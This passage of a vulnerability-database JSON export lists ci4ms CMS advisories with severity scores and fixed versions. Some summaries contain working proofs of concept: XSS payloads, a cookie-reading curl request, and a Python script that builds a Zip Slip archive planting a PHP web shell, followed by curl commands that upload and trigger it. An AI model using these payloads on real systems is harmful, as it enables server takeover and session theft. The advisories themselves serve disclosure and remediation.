                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34566",
                "GHSA-458r-h248-29c5"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j76j-w4bk-nuft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90026?format=api",
            "vulnerability_id": "VCID-kedh-z3qx-rfaq",
            "summary": "CI4MS: Blogs Tags Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM XSS\n## Summary\n### **Vulnerability: Stored DOM XSS via Blog Tag Name (Persistent Payload Injection)**\n- Stored Cross-Site Scripting via Unsanitized Blog Tag Name in Blog Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when creating or editing blog tags. An attacker can inject a malicious JavaScript payload into the tag name field, which is then stored server-side.\n\nThis stored payload is later rendered unsafely across public tag pages and administrative interfaces without proper output encoding, leading to stored cross-site scripting (XSS).\n\n### Affected Functionality\n- Blog tag creation functionality\n- Blog tag editing functionality\n- Blog tag storage and retrieval logic\n\n### Attack Scenario\n- An attacker creates or edits a blog tag name to include a malicious XSS payload.\n- The application stores this value without sanitization or encoding.\n- The payload persists and executes whenever the tag name is rendered in affected views.\n\n### Impact\n- Persistent Stored XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/blogs/tags/`\n- `/blog/{id}`\n\n## Steps To Reproduce (POC)\n1. Go to the Blog Tags management page\n2. Create or edit a tag and insert an XSS payload into the tag name such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Save the tag\n4. View a public blog page or the administrative interface where the tag is rendered\n5. Notice the XSS payload executing automatically\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n# Ready Video POC:\nhttps://mega.nz/file/GI9Bnbha#FkVY4K7AiuttnBGDFaCtxuJwKk-afRcKjYJnkqfLZOM",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34559",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05058",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05035",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.05043",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00021",
                            "scoring_system": "epss",
                            "scoring_elements": "0.06082",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34559"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4333-387x-w245",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-4333-387x-w245"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34559",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34559"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4333-387x-w245",
                    "reference_id": "GHSA-4333-387x-w245",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4333-387x-w245"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1002519?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2v9s-x9dt-8ugb"
                        },
                        {
                            "vulnerability": "VCID-6nzs-j8gz-9ucu"
                        },
                        {
                            "vulnerability": "VCID-8x3z-1p5j-6qfa"
                        },
                        {
                            "vulnerability": "VCID-c1ux-y4qk-xfch"
                        },
                        {
                            "vulnerability": "VCID-e9xp-rar3-c7bp"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-p1q2-w18a-3kae"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        },
                        {
                            "vulnerability": "VCID-w12h-33nr-bufh"
                        },
                        {
                            "vulnerability": "VCID-ye3h-3tu7-p3e7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109898?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.0%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.0%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-34559",
                "GHSA-4333-387x-w245"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kedh-z3qx-rfaq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89081?format=api",
            "vulnerability_id": "VCID-mds3-7xh3-mkgv",
            "summary": "CI4MS Theme::upload is vulnerable to Zip Slip leading to RCE\n### Summary\nci4ms Theme::upload extracts user uploaded ZIP archives without validating entry names, allowing an authenticated backend user with the theme create permission to write files to arbitrary filesystem locations (Zip Slip) and achieve remote code execution by dropping a PHP file under the public web root.\n\n### Details\nmodules/Theme/Controllers/Theme.php:13-56 implements the theme upload action. ZipArchive::extractTo() is called directly with no iteration over entry names to verify they resolve inside the destination:\n\n```php\npublic function upload()\n{\n    $valData = ([\n        'theme' => ['label' => lang('Theme.backendTheme'), 'rules' => 'uploaded[theme]|ext_in[theme,zip]|mime_in[theme,...]'],\n    ]);\n    if ($this->validate($valData) == false) return redirect()->route('backendThemes')->withInput()->with('errors', $this->validator->getErrors());\n    $file = $this->request->getFile('theme');\n    $tempPath = WRITEPATH . 'tmp/' . str_replace('_theme.zip', '', $file->getName()) . '/';\n    $zip = new \\ZipArchive();\n    if ($zip->open($file->getTempName()) === true) {\n        $zip->extractTo($tempPath);     // no entry-name validation\n        $zip->close();\n    } ...\n    $log = install_theme_from_tmp($themeName);\n    ...\n}\n```\n\nA ZIP containing entries like `../../public/shell.php` is extracted outside `writable/tmp/` into directories served by PHP. The author validates entries correctly in modules/Methods/Controllers/Methods.php:165-175 with a realpath + regex loop; the same check is missing here.\n\nRouting: modules/Theme/Config/Routes.php binds `POST backend/themes/themesUpload` to Theme::upload with `role=create`. Although ThemeConfig itself does not list the route in csrfExcept, the upload handler is still reachable cross-site by any admin browser that has `create` on the Theme module, and any admin with that role can trigger it directly.\n\nA companion Zip Slip bug in Backup::restore is tracked separately as GHSA-xp9f-pvvc-57p4.\n\n### PoC\nBuild the archive:\n\n```python\npython3 -c \"\nimport zipfile\nwith zipfile.ZipFile('evil_theme.zip','w') as z:\n    z.writestr('../../public/shell.php', '<?php system(\\$_GET[\\\"c\\\"]); ?>')\n    z.writestr('info.xml', '<theme name=\\\"x\\\"/>')\n\"\n```\n\nUpload through the Theme manager with an authenticated session that has theme create:\n\n```bash\ncurl -i -b 'ci4ms_session=<SESSION_ID>' \\\n  -F 'theme=@evil_theme.zip' \\\n  https://target.example.com/backend/themes/themesUpload\n```\n\nTrigger the shell:\n\n```bash\ncurl 'https://target.example.com/shell.php?c=id'\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n### Impact\nAny ci4ms account that can upload a theme can write arbitrary files under the application root and gain remote code execution on the server, fully compromising the installation, the database credentials stored in .env, and any content the site handles.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41203",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64694",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64693",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00464",
                            "scoring_system": "epss",
                            "scoring_elements": "0.64703",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00534",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67775",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41203"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T13:49:29Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-07T13:49:29Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-xv3r-vr59-95rg"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41203",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41203"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-xv3r-vr59-95rg",
                    "reference_id": "GHSA-xv3r-vr59-95rg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-xv3r-vr59-95rg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1126288?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1041566?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110106?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.5%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.5%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-41203",
                "GHSA-xv3r-vr59-95rg"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mds3-7xh3-mkgv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89213?format=api",
            "vulnerability_id": "VCID-p1q2-w18a-3kae",
            "summary": "CI4MS has stored XSS via Unescaped Blacklist Note in Admin User List\n## Summary\n\nThe blacklist (ban) note parameter in `UserController::ajax_blackList_post()` is stored in the database without sanitization and rendered into an HTML `data-note` attribute without escaping. An admin with blacklist privileges can inject arbitrary JavaScript that executes in the browser of any other admin who views the user management page.\n\n## Details\n\nIn `modules/Users/Controllers/UserController.php`, the `ajax_blackList_post()` method (line 344-362) accepts a `note` POST parameter with only a `required` validation rule:\n\n```php\n// Line 347 — validation only checks 'required', no sanitization\n$valData = (['note' => ['label' => lang('Backend.notes'), 'rules' => 'required'],\n             'uid' => ['label' => 'uid', 'rules' => 'required|is_natural_no_zero']]);\n\n// Line 352 — raw user input passed directly to ban()\n$user->ban($this->request->getPost('note'));\n```\n\nShield's `Bannable::ban()` trait stores the message as-is:\n```php\n// vendor/codeigniter4/shield/src/Traits/Bannable.php\npublic function ban(?string $message = null): self\n{\n    $this->status         = 'banned';\n    $this->status_message = $message;  // No escaping\n    // ...\n}\n```\n\nIn the `users()` method (line 13-91), when building the DataTables response, the `status_message` is concatenated directly into HTML without escaping:\n\n```php\n// Line 55 — esc() IS used here (correct)\n$result->fullname = esc($result->firstname) . ' ' . esc($result->surname);\n\n// Line 58-59 — NO esc() on status_message (vulnerable)\nif ($result->status == 'banned'):\n    $result->actions .= '<button ... data-note=\"' . $result->status_message . '\">'\n```\n\nThe HTML string is returned as JSON (line 90) and DataTables renders it into the DOM. CSP is disabled (`$CSPEnabled = false` in `App.php`), and no `SecureHeaders` filter is applied.\n\n## PoC\n\n**Step 1 — Store XSS payload via ban endpoint:**\n```bash\ncurl -X POST 'https://TARGET/backend/users/blackList' \\\n  -H 'X-Requested-With: XMLHttpRequest' \\\n  -H 'Cookie: ci_session=ADMIN_SESSION_WITH_UPDATE_PERM' \\\n  -d 'uid=2&note=%22+onmouseover%3D%22alert(document.cookie)%22+x%3D%22'\n```\n\nExpected response: `{\"result\":true,\"error\":{\"type\":\"success\",\"message\":\"...\"}}`\n\n**Step 2 — Trigger payload:**\nAny admin navigating to `/backend/users` will receive HTML containing:\n```html\n<button ... data-note=\"\" onmouseover=\"alert(document.cookie)\" x=\"\">\n```\n\nThe XSS fires when the admin hovers over the blacklist button for the banned user.\n\n**Alternative immediate-execution payload:**\n```\nnote=\"><img src=x onerror=alert(document.cookie)>\n```\n\n## Impact\n\n- **Session hijacking**: An attacker with blacklist privileges can steal session cookies of other admins (including superadmins who view the user list but are themselves protected from being banned).\n- **Privilege escalation**: A lower-privileged admin could use stolen superadmin sessions to gain full control.\n- **Persistent**: The payload persists in the database and fires every time the user list is loaded, affecting all admins who view the page.\n\n## Recommended Fix\n\nWrap `status_message` with `esc()` to match the escaping already applied to other user fields on line 55:\n\n```php\n// In users() method, line 58-59 — change:\n$result->actions .= '<button type=\"button\" class=\"btn btn-outline-dark btn-sm open-blacklist-modal\"\n                        data-id=\"' . $result->id . '\" data-status=\"' . $result->status . '\" data-note=\"' . esc($result->status_message) . '\"><i\n```",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39391",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02552",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02483",
                            "published_at": "2026-06-08T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02498",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02555",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39391"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.4.0"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-7cm9-v848-cfh2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T15:18:05Z/"
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-7cm9-v848-cfh2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39391",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39391"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7cm9-v848-cfh2",
                    "reference_id": "GHSA-7cm9-v848-cfh2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7cm9-v848-cfh2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/1015581?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-cd9w-5f22-xkfk"
                        },
                        {
                            "vulnerability": "VCID-fjcm-syrk-87fg"
                        },
                        {
                            "vulnerability": "VCID-j32w-tcpz-1fak"
                        },
                        {
                            "vulnerability": "VCID-mds3-7xh3-mkgv"
                        },
                        {
                            "vulnerability": "VCID-qrag-mndk-xbb7"
                        },
                        {
                            "vulnerability": "VCID-ux28-acyz-kqd1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110229?format=api",
                    "purl": "pkg:composer/ci4-cms-erp/ci4ms@0.31.4%2B0",
                    "is_vulnerable": false,
                    "affected_by_vulnerabilities": [],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/ci4-cms-erp/ci4ms@0.31.4%252B0"
                }
            ],
            "aliases": [
                "CVE-2026-39391",
                "GHSA-7cm9-v848-cfh2"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p1q2-w18a-3kae"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90287?format=api",
            "vulnerability_id": "VCID-pds3-bx1t-zfbt",
            "summary": "CI4MS: Backup Management Full Account Takeover for All-Roles & Privilege-Escalation via Stored DOM Blind XSS\n## Summary\n### **Vulnerability: Stored DOM Blind XSS via Backup Management Filename (Persistent Payload Injection)**\n- Stored Cross-Site Scripting (Blind XSS) via Unsanitized Backup Filename in Backup Management\n\n### Description\nThe application fails to properly sanitize user-controlled input when handling backup uploads and processing backup metadata. An attacker can inject a malicious JavaScript payload into the backup filename via the uploaded `xss.sql`, which uses SQL functionality to insert the XSS payload server-side.\n\nThis stored payload is later rendered unsafely in multiple backup management views without proper output encoding, leading to stored blind cross-site scripting (Blind XSS).\n\n### Affected Functionality\n- Backup upload functionality\n- Backup processing functionality\n- Backup storage and retrieval logic\n\n### Attack Scenario\n- An attacker uploads `xss.sql` which uses SQL functionality to insert a malicious XSS payload into the backup filename field server-side.\n- The application stores this filename without sanitization or encoding.\n- The payload persists and executes whenever the backup filename is rendered in affected views.\n- The attacker does not see immediate execution, making this a Blind XSS scenario that triggers only when an administrator or privileged user views the backup management panel.\n\n### Impact\n- Persistent Stored Blind XSS\n- Execution of arbitrary JavaScript in victims’ browsers\n- Privilege escalation when viewed by administrators or privileged users\n- Full administrator account takeover\n- Full account takeover across all roles\n- Full compromise of the entire application\n\nEndpoints:\n- `/backend/backup/upload`\n- `/backend/backup/`\n- `/backup/{id}`\n\n## Steps To Reproduce (POC)\n1. Upload `xss.sql` via the Backup Upload functionality\n2. Ensure the SQL executes and inserts an XSS payload into the backup filename field such as:\n`<img src=x onerror=alert(document.domain)>`\n3. Navigate to the Backup Management panel as an administrator\n4. View the backup entry via the administrative panel\n5. Notice the XSS payload executing automatically (Blind XSS)\n\n## Remediation\n\n- **Avoid unsafe DOM manipulation methods:** Do not use `.html()`, `innerHTML`, or similar sink functions in client-side JavaScript or server-side templating (e.g., PHP). Even when user input flowing into these sinks is not immediately apparent, they can introduce Cross-Site Scripting (XSS) vulnerabilities that an attacker may exploit.\n\n- **Apply output encoding:** Implement HTML entity encoding on all user-controlled data before rendering it in the browser. This helps neutralize potentially malicious input.\n\n- **Implement input sanitization:** Ensure that all user-supplied input is properly sanitized before processing or output. Currently, no sanitization mechanisms are in place, which should be addressed as a priority.\n\n- **Enforce security headers and cookie attributes:**\n  - **Content Security Policy (CSP):** Define and enforce a strict CSP to limit the execution of unauthorized scripts.\n  - **HttpOnly flag:** Set the `HttpOnly` attribute on session cookies to prevent client-side script access.\n  - **SameSite attribute:** Configure the `SameSite` cookie attribute to mitigate Cross-Site Request Forgery (CSRF) risks.\n  - **Secure flag:** Ensure all cookies are transmitted only over HTTPS by enabling the `Secure` attribute.\n\n  These measures collectively reduce the impact of XSS and help prevent escalation paths such as CSRF via XSS.\n\n# Ready Video POC:\nhttps://mega.nz/file/eNFXgAAA#IETbPcKwr5vVLqJIAdc3uy4qgcVTgyPb_2HhB4zcwAE",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34563",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15923",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15872",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0005",
                            "scoring_system": "epss",
                            "scoring_elements": "0.15912",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00058",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18292",
                            "published_at": "2026-06-08T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34563"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/ci4-cms-erp/ci4ms"
                },
                {
                    "reference_url": "https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.0.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
